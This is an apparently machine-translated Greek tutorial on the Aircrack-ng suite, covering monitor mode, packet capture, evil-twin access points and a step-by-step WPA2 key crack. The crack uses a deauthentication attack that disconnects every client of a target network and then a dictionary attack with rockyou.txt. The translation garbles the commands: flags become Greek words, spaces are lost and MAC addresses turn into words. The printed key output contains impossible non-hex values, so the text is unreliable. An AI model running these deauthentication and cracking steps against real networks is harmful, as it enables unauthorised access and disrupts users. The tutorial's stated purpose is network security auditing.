Πώς να χρησιμοποιήσετε το Aircrack-ng

How Use Aircrack Ng



Τις περισσότερες φορές, οι άνθρωποι δεν σκέφτονται ποτέ το δίκτυο στο οποίο είναι συνδεδεμένοι. Ποτέ δεν σκέφτονται πόσο ασφαλές είναι αυτό το δίκτυο και πόσο διακινδυνεύουν τα εμπιστευτικά δεδομένα τους σε καθημερινή βάση. Μπορείτε να εκτελέσετε ελέγχους ευπάθειας στα δίκτυα wifi σας χρησιμοποιώντας ένα πολύ ισχυρό εργαλείο που ονομάζεται Aircrack-ng και Wireshark. Το Wireshark χρησιμοποιείται για την παρακολούθηση της δραστηριότητας του δικτύου. Aircrack-ng μοιάζει περισσότερο με ένα επιθετικό εργαλείο που σας επιτρέπει να κάνετε hack και να έχετε πρόσβαση σε ασύρματες συνδέσεις. Η σκέψη ως εισβολέας ήταν πάντα ο ασφαλέστερος τρόπος για να προστατευθείτε από ένα hack. Mightσως μπορείτε να κατανοήσετε τις ακριβείς ενέργειες που θα κάνει ένας εισβολέας για να αποκτήσει πρόσβαση στο σύστημά σας, μαθαίνοντας για το aircrack. Στη συνέχεια, μπορείτε να πραγματοποιήσετε ελέγχους συμμόρφωσης στο δικό σας σύστημα για να διασφαλίσετε ότι δεν είναι ανασφαλές.

Aircrack-ng είναι ένα πλήρες σύνολο λογισμικού που έχει σχεδιαστεί για να ελέγχει την ασφάλεια του δικτύου WiFi. Δεν είναι απλώς ένα μόνο εργαλείο αλλά μια συλλογή εργαλείων, καθένα από τα οποία εκτελεί έναν συγκεκριμένο σκοπό. Διάφοροι τομείς ασφάλειας wifi μπορούν να λειτουργήσουν, όπως η παρακολούθηση του σημείου πρόσβασης, ο έλεγχος, η επίθεση στο δίκτυο, το σπάσιμο του δικτύου wifi και η δοκιμή του. Ο βασικός στόχος του Aircrack είναι να υποκλέψει τα πακέτα και να αποκρυπτογραφήσει τα hashes για να σπάσει τους κωδικούς πρόσβασης. Υποστηρίζει σχεδόν όλες τις νέες ασύρματες διεπαφές. Aircrack-ng είναι μια βελτιωμένη έκδοση μιας ξεπερασμένης σουίτας εργαλείων Aircrack, η ng αναφέρεται στο Νέα γενιά Το Μερικά από τα φοβερά εργαλεία που συνεργάζονται για την εκτέλεση μιας μεγαλύτερης εργασίας.







Αεροπόρος:

Το Airmon-ng περιλαμβάνεται στο κιτ aircrack-ng που τοποθετεί την κάρτα διασύνδεσης δικτύου στη λειτουργία οθόνης. Οι κάρτες δικτύου συνήθως δέχονται μόνο πακέτα που προορίζονται για αυτά, όπως ορίζονται από τη διεύθυνση MAC της NIC, αλλά με το airmon-ng, όλα τα ασύρματα πακέτα, είτε απευθύνονται σε αυτά είτε όχι, θα γίνονται αποδεκτά επίσης. Θα πρέπει να μπορείτε να πιάσετε αυτά τα πακέτα χωρίς σύνδεση ή έλεγχο ταυτότητας με το σημείο πρόσβασης. Χρησιμοποιείται για τον έλεγχο της κατάστασης ενός σημείου πρόσβασης, θέτοντας τη διεπαφή δικτύου σε λειτουργία παρακολούθησης. Πρώτα πρέπει να διαμορφώσετε τις ασύρματες κάρτες για να ενεργοποιήσετε τη λειτουργία οθόνης και, στη συνέχεια, να σκοτώσετε όλες τις διαδικασίες παρασκηνίου εάν νομίζετε ότι οποιαδήποτε διαδικασία παρεμβαίνει σε αυτήν. Μετά τον τερματισμό των διαδικασιών, η λειτουργία παρακολούθησης μπορεί να ενεργοποιηθεί στην ασύρματη διεπαφή εκτελώντας την παρακάτω εντολή:



[email protected]: ~ $sudoairmon-ng εκκίνηση wlan0#

Μπορείτε επίσης να απενεργοποιήσετε τη λειτουργία οθόνης διακόπτοντας το airmon-ng οποιαδήποτε στιγμή, χρησιμοποιώντας την παρακάτω εντολή:

[email protected]: ~ $sudoairmon-ng stop wlan0#

Airodump:

Το Airodump-ng χρησιμοποιείται για τη λίστα όλων των δικτύων που μας περιβάλλουν και για την προβολή πολύτιμων πληροφοριών σχετικά με αυτά. Η βασική λειτουργικότητα του airodump-ng είναι να μυρίζει πακέτα, οπότε είναι ουσιαστικά προγραμματισμένο να αρπάζει όλα τα πακέτα γύρω μας ενώ βάζουμε σε λειτουργία οθόνης. Θα το εκτελέσουμε ενάντια σε όλες τις συνδέσεις γύρω μας και θα συλλέξουμε δεδομένα όπως τον αριθμό των πελατών που είναι συνδεδεμένοι στο δίκτυο, τις αντίστοιχες διευθύνσεις mac τους, το στυλ κρυπτογράφησης και τα ονόματα καναλιών και, στη συνέχεια, θα αρχίσουμε να στοχεύουμε στο δίκτυο -στόχο μας.

Πληκτρολογώντας την εντολή airodump-ng και δίνοντάς της ως παράμετρο το όνομα της διεπαφής δικτύου, μπορούμε να ενεργοποιήσουμε αυτό το εργαλείο. Θα αναφέρει όλα τα σημεία πρόσβασης, τον αριθμό των πακέτων δεδομένων, τις μεθόδους κρυπτογράφησης και ελέγχου ταυτότητας που χρησιμοποιούνται και το όνομα του δικτύου (ESSID). Από την άποψη του hacking, οι διευθύνσεις mac είναι τα πιο σημαντικά πεδία.

[email protected]: ~ $sudoairodump-ng wlx0mon

Aircrack:

Το Aircrack χρησιμοποιείται για το σπάσιμο του κωδικού πρόσβασης. Αφού καταγράψουμε όλα τα πακέτα χρησιμοποιώντας airodump, μπορούμε να σπάσουμε το κλειδί με aircrack. Σπάει αυτά τα κλειδιά χρησιμοποιώντας δύο μεθόδους PTW και FMS. Η προσέγγιση PTW γίνεται σε δύο φάσεις. Στην αρχή, χρησιμοποιούνται μόνο τα πακέτα ARP και μόνο στη συνέχεια, εάν το κλειδί δεν σπάσει μετά την αναζήτηση, χρησιμοποιεί όλα τα άλλα πακέτα που έχουν καταγραφεί. Ένα πλεονέκτημα της προσέγγισης PTW είναι ότι δεν χρησιμοποιούνται όλα τα πακέτα για το σπάσιμο. Στη δεύτερη προσέγγιση, δηλαδή, το FMS, χρησιμοποιούμε τόσο τα στατιστικά μοντέλα όσο και το βίαιο άλγος για το σπάσιμο του κλειδιού. Μπορεί επίσης να χρησιμοποιηθεί μια μέθοδος λεξικού.

Aireplay:

Το Airplay-ng εισάγει πακέτα σε ασύρματο δίκτυο για τη δημιουργία ή την επιτάχυνση της επισκεψιμότητας. Πακέτα από δύο διαφορετικές πηγές μπορούν να καταγραφούν από το aireplay-ng. Το πρώτο είναι το ζωντανό δίκτυο και το δεύτερο είναι τα πακέτα από το ήδη υπάρχον αρχείο pcap. Το Airplay-ng είναι χρήσιμο κατά τη διάρκεια μιας επίθεσης deauthentication που στοχεύει ένα ασύρματο σημείο πρόσβασης και έναν χρήστη. Επιπλέον, μπορείτε να εκτελέσετε ορισμένες επιθέσεις, όπως καφέ επίθεση latte με airplay-ng, ένα εργαλείο που σας επιτρέπει να πάρετε ένα κλειδί από το σύστημα του πελάτη. Μπορείτε να το επιτύχετε πιάνοντας ένα πακέτο ARP και στη συνέχεια χειρίζοντάς το και στέλνοντάς το πίσω στο σύστημα. Στη συνέχεια, ο πελάτης θα δημιουργήσει ένα πακέτο που μπορεί να συλληφθεί με airodump και το aircrack σπάσει το κλειδί από αυτό το τροποποιημένο πακέτο. Ορισμένες άλλες επιλογές επίθεσης του airplay-ng περιλαμβάνουν chopchop, fragment arepreplay κ.λπ.

Αεροπορική βάση:

Το Airbase-ng χρησιμοποιείται για τη μετατροπή του υπολογιστή ενός εισβολέα σε ένα σημείο παραβίασης της σύνδεσης στο οποίο μπορούν να συνδεθούν άλλοι. Χρησιμοποιώντας το Airbase-ng, μπορείτε να ισχυριστείτε ότι είστε ένα νόμιμο σημείο πρόσβασης και να πραγματοποιήσετε επιθέσεις κατά μέσο όρο σε υπολογιστές που είναι συνδεδεμένοι στο δίκτυό σας. Αυτού του είδους οι επιθέσεις ονομάζονται Evil Twin Attacks. Είναι αδύνατο για τους βασικούς χρήστες να κάνουν διάκριση μεταξύ νομικού σημείου πρόσβασης και ψεύτικου σημείου πρόσβασης. Έτσι, η κακή διπλή απειλή είναι από τις πιο απειλητικές ασύρματες απειλές που αντιμετωπίζουμε σήμερα.

Airolib-ng:

Η Airolib επιταχύνει τη διαδικασία χάκερ αποθηκεύοντας και διαχειριζόμενη τις λίστες κωδικών πρόσβασης και το σημείο πρόσβασης. Το σύστημα διαχείρισης βάσεων δεδομένων που χρησιμοποιείται από αυτό το πρόγραμμα είναι το SQLite3, το οποίο είναι κυρίως διαθέσιμο σε όλες τις πλατφόρμες. Η ρωγμή κωδικού πρόσβασης περιλαμβάνει τον υπολογισμό του κύριου κλειδιού κατά ζεύγη μέσω του οποίου εξάγεται το ιδιωτικό μεταβατικό κλειδί (PTK). Χρησιμοποιώντας το PTK, μπορείτε να καθορίσετε τον κωδικό αναγνώρισης μηνύματος πλαισίου (MIC) για ένα δεδομένο πακέτο και θεωρητικά να βρείτε ότι το MIC είναι παρόμοιο με το πακέτο, οπότε αν το PTK ήταν σωστό, το PMK ήταν επίσης σωστό.

Για να δείτε τις λίστες κωδικών πρόσβασης και τα δίκτυα πρόσβασης που είναι αποθηκευμένα στη βάση δεδομένων, πληκτρολογήστε την ακόλουθη εντολή:

[email protected]: ~ $sudoairolib-ng testdatabase –stats

Εδώ η δοκιμαστική βάση δεδομένων είναι το db στο οποίο θέλετε να αποκτήσετε πρόσβαση ή να δημιουργήσετε και –stats είναι η λειτουργία που θέλετε να εκτελέσετε σε αυτήν. Μπορείτε να κάνετε πολλαπλές λειτουργίες στα πεδία της βάσης δεδομένων, όπως να δώσετε τη μέγιστη προτεραιότητα σε κάποιο SSID ή κάτι τέτοιο. Για να χρησιμοποιήσετε το airolib-ng με το aircrack-ng, εισαγάγετε την ακόλουθη εντολή:

[email protected]: ~ $sudoaircrack-ng-rtestdatabase wpa2.eapol.cap

Εδώ χρησιμοποιούμε τα ήδη υπολογισμένα PMK που είναι αποθηκευμένα στο δοκιμαστική βάση δεδομένων για επιτάχυνση της διαδικασίας σπασίματος κωδικού πρόσβασης.

Ρήξη WPA/WPA2 χρησιμοποιώντας Aircrack-ng:

Ας δούμε ένα μικρό παράδειγμα του τι μπορεί να κάνει το aircrack-ng με τη βοήθεια μερικών από τα φοβερά εργαλεία του. Θα σπάσουμε το προ-κοινόχρηστο κλειδί ενός δικτύου WPA/WPA2 χρησιμοποιώντας μια μέθοδο λεξικού.

Το πρώτο πράγμα που πρέπει να κάνουμε είναι να απαριθμήσουμε διεπαφές δικτύου που υποστηρίζουν τη λειτουργία παρακολούθησης. Αυτό μπορεί να γίνει χρησιμοποιώντας την ακόλουθη εντολή:

[email protected]: ~ $sudoairmon-ng

Chipset προγράμματος οδήγησης διεπαφής PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

Μπορούμε να δούμε μια διεπαφή. Τώρα, πρέπει να θέσουμε τη διεπαφή δικτύου που βρήκαμε (wlx0) σε λειτουργία παρακολούθησης χρησιμοποιώντας την ακόλουθη εντολή:

[email protected]: ~ $sudoairmon-ng εκκίνηση wlx0

Έχει ενεργοποιήσει τη λειτουργία παρακολούθησης στη διεπαφή που ονομάζεται wlx0mon Το

Τώρα θα πρέπει να αρχίσουμε να ακούμε εκπομπές από κοντινούς δρομολογητές μέσω της διεπαφής δικτύου που έχουμε θέσει σε λειτουργία οθόνης.

[email protected]: ~ $sudoairodump-ng wlx0mon

CH5 ][Παρήλθε:30μικρό][ 2020-12-02 00:17



BSSID PWR Beacons#Δεδομένα, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -Τέσσερα πέντε 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:ΕΙΝΑΙ-63 77 0 0 654ε. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:ΔΙΝΕΙ:88:ΦΑ:38: 02-68 28 2 0 έντεκα54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frame Probe



E4: 6F:13: 04: CE:315C: 3A:Τέσσερα πέντε: D7: EA: 8B -3 0- 1ε8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31ΠΡΟ ΧΡΙΣΤΟΥ:91: B5: F8: 7E: D5 -390e-1 1002 13

Το δίκτυο στόχος μας είναι Crackit σε αυτήν την περίπτωση, η οποία εκτελείται αυτήν τη στιγμή στο κανάλι 1.

Εδώ, για να σπάσουμε τον κωδικό πρόσβασης του δικτύου στόχου, πρέπει να καταγράψουμε μια χειραψία 4 κατευθύνσεων, η οποία συμβαίνει όταν μια συσκευή προσπαθεί να συνδεθεί σε ένα δίκτυο. Μπορούμε να το καταγράψουμε χρησιμοποιώντας την ακόλουθη εντολή:

[email protected]: ~ $sudoairodump-ng-ντο 1--bssid E4: 6F:13: 04: CE:31 -σε /σπίτι wlx0

-ντο : Κανάλι

- Bss : Bssid του δικτύου στόχου

-σε : Το όνομα του καταλόγου όπου θα τοποθετηθεί το αρχείο pcap

Τώρα πρέπει να περιμένουμε μια συσκευή να συνδεθεί στο δίκτυο, αλλά υπάρχει καλύτερος τρόπος για να συλλάβουμε μια χειραψία. Μπορούμε να καταργήσουμε την ταυτότητα των συσκευών στο AP χρησιμοποιώντας μια επίθεση deauthentication χρησιμοποιώντας την ακόλουθη εντολή:

[email protected]: ~ $sudoaireplay-ng-0 -προς τοE4: 6F:13: 04: CE:31

προς το : Bssid του δικτύου στόχου

-0 : επίθεση deauthentication

Αποσυνδέσαμε όλες τις συσκευές και τώρα πρέπει να περιμένουμε να συνδεθεί μια συσκευή στο δίκτυο.

CH1 ][Παρήλθε:30μικρό][ 2020-12-02 00:02][WPA χειραψία: E4: 6F:13: 04: CE:31



Φάροι BSSID PWR RXQ#Δεδομένα, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154ο WPA2 CCMP PSK P



BSSID STATION PWR Rate Lost Frame Probe



E4: 6F:13: 04: CE:31ΠΡΟ ΧΡΙΣΤΟΥ:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:Τέσσερα πέντε: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: Β3:30:27: 7Ε -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1ε0 1

Πήραμε ένα χτύπημα και κοιτάζοντας την επάνω δεξιά γωνία ακριβώς δίπλα, βλέπουμε μια χειραψία να έχει καταγραφεί. Τώρα κοιτάξτε στον καθορισμένο φάκελο ( /Σπίτι στην περίπτωσή μας) για α .pcap αρχείο.

Για να σπάσουμε το κλειδί WPA, μπορούμε να χρησιμοποιήσουμε την ακόλουθη εντολή:

[email protected]: ~ $sudoaircrack-ng-Α2 -σεrockyou.txt-σιE4: 6F:13: 04: CE:31χειραψία.καπάκι

β: Bssid του δικτύου στόχου

-a2: Λειτουργία WPA2

Rockyou.txt: Το λεξικόαρχείομεταχειρισμένος

Χειραψία.καπάκι: Τοαρχείο οι οποίεςπεριέχει καταγεγραμμένη χειραψία

Aircrack-ng1.2βήτα3

[00:01:49] 10566δοκιμασμένα κλειδιά(1017.96προς το/μικρό)

ΒΡΕΘΗΚΕ ΒΑΣΙΚΟ! [με έπιασες]

Κύριο κλειδί: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896Β 7Β 6Δ

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6Fπενήνταντο


Μεταβατικό κλειδί: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A089

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A089

MAC: CB 5A F8 CE62B2 1B F7 6FπενήνταC025 62Ε9 5Δ71

Το κλειδί στο δίκτυο -στόχο μας έχει σπάσει με επιτυχία.

Συμπέρασμα:

Τα ασύρματα δίκτυα υπάρχουν παντού, χρησιμοποιούνται από κάθε εταιρεία, από εργαζόμενους που χρησιμοποιούν smartphone έως βιομηχανικές συσκευές ελέγχου. Σύμφωνα με έρευνες, σχεδόν το 50 τοις εκατό της κίνησης στο Διαδίκτυο θα είναι μέσω WiFi το 2021. Τα ασύρματα δίκτυα έχουν πολλά πλεονεκτήματα, επικοινωνία έξω από τις πόρτες, γρήγορη πρόσβαση στο Διαδίκτυο σε μέρη όπου είναι σχεδόν αδύνατο να τοποθετηθούν καλώδια, μπορεί να επεκταθεί το δίκτυο χωρίς εγκατάσταση καλωδίων για οποιονδήποτε άλλο χρήστη και μπορεί εύκολα να συνδέσει τις κινητές συσκευές σας στα γραφεία του σπιτιού σας ενώ δεν είστε εκεί.

Παρά αυτά τα πλεονεκτήματα, υπάρχει ένα μεγάλο ερωτηματικό σχετικά με την ιδιωτικότητα και την ασφάλειά σας. Όπως αυτά τα δίκτυα? εντός του εύρους εκπομπής, οι δρομολογητές είναι ανοιχτοί σε όλους, μπορούν εύκολα να επιτεθούν και τα δεδομένα σας μπορούν εύκολα να παραβιαστούν. Για παράδειγμα, εάν είστε συνδεδεμένοι σε κάποιο δημόσιο wifi, οποιοσδήποτε συνδεδεμένος σε αυτό το δίκτυο μπορεί εύκολα να ελέγξει την επισκεψιμότητα του δικτύου σας χρησιμοποιώντας κάποια ευφυΐα και με τη βοήθεια τρομερών διαθέσιμων εργαλείων, ακόμη και να το απορρίψει.